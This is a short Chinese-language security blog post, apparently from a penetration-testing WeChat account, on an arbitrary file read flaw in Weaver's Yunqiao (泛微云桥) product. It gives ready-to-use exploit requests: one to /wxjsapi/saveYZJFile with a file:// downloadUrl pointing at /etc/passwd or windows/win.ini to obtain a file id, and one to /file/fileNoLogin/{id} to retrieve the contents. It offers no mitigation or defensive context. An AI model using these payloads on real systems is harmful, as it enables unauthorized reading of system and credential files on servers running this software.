泛微云桥任意文件读取

  • A+
所属分类:安全文章

点击蓝字 ·  关注我们

01

漏洞标题

微云桥任意文件读取


02

生成文件id


0x01 payload

Linux:

/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt

Windows:

/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C://windows/win.ini&fileExt=txt


03

获取文件内容

Payload:/file/fileNoLogin/{id值}


04

Linux复现


泛微云桥任意文件读取


泛微云桥任意文件读取


05

Windows复现


泛微云桥任意文件读取



关注EDI安全,获取更多HVV情报

EDI安全

泛微云桥任意文件读取

扫二维码|关注我们

一个专注渗透实战经验分享的公众号

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: